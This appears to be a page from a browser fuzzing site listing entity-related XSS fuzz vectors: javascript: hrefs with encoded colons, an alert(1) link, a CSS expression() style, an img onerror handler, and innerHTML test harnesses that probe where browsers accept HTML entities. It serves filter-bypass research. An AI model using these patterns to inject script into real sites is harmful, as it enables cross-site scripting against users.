Featured vector

No vectors found in the last 30 days

Fuzz vector cloud

5,457,354 Successful fuzzes

Fuzz Vectors

Searching for "entities"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
characters allowd in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed inside js protocol htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before CSS rule htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } @garethheyes